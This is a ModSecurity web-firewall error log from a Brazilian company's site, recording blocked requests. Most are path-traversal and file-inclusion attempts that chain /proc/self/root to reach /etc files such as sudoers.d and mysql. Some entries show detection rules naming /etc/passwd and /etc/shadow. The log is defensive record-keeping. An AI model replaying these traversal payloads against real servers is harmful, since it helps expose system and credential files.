[Tue Mar 17 11:30:24.712692 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.243.203:39976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllgK4xEDsg_V3ESNY-ngAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:28.104940 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.46:41338] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllhNY0UrI5A3LftIzt5gAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:30:31.751126 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.243.203:48514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllh7-sgTmmJoPuMdyp8gAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:30:35.650483 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.243.203:41256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablli6t8Nd0UC_OcbVG7MAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:36.280974 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.46:46240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablljNY0UrI5A3LftIzt7gAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:38.115849 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.243.203:41268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablljjarLhPAjZGI1b25xAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:41.717233 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.243.203:41276] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllkb-sgTmmJoPuMdyp9gAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:30:46.418632 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:50158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablllgeiSKl8TjouI-YNHAAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:30:48.810377 2026] [:error] [pid 9155:tid 140411716749056] [client 74.7.243.203:50168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllmNbI7zhHXcabyMUxrAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:30:53.250864 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:50172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllnQeiSKl8TjouI-YNIwAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:30:59.421208 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:60990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllo64xEDsg_V3ESNY-tQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:31:03.087358 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.243.203:41726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllp7-sgTmmJoPuMdyqBAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:31:06.675026 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.243.203:41730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllqpqmL8PQht4WJFlTkAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:31:08.071439 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.243.203:41744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllrJqmL8PQht4WJFlTkgAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:31:34.039237 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.228.16:35538] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abllxq4xEDsg_V3ESNY-vAAAAgc"]
[Tue Mar 17 11:31:46.415955 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.46:46252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abll0geiSKl8TjouI-YNVAAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:31:50.853498 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.241.46:60140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abll1tbI7zhHXcabyMUxwAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:32:08.171377 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.241.46:43502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abll6JqmL8PQht4WJFlTqQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:32:44.996526 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.243.203:41754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmDL-sgTmmJoPuMdyqZAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:46.483592 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.243.203:36384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmDq4xEDsg_V3ESNY-xgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:47.727950 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.243.203:36386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmDzarLhPAjZGI1b252gAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:32:49.001402 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.203:36402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmEdY0UrI5A3LftIzuGgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
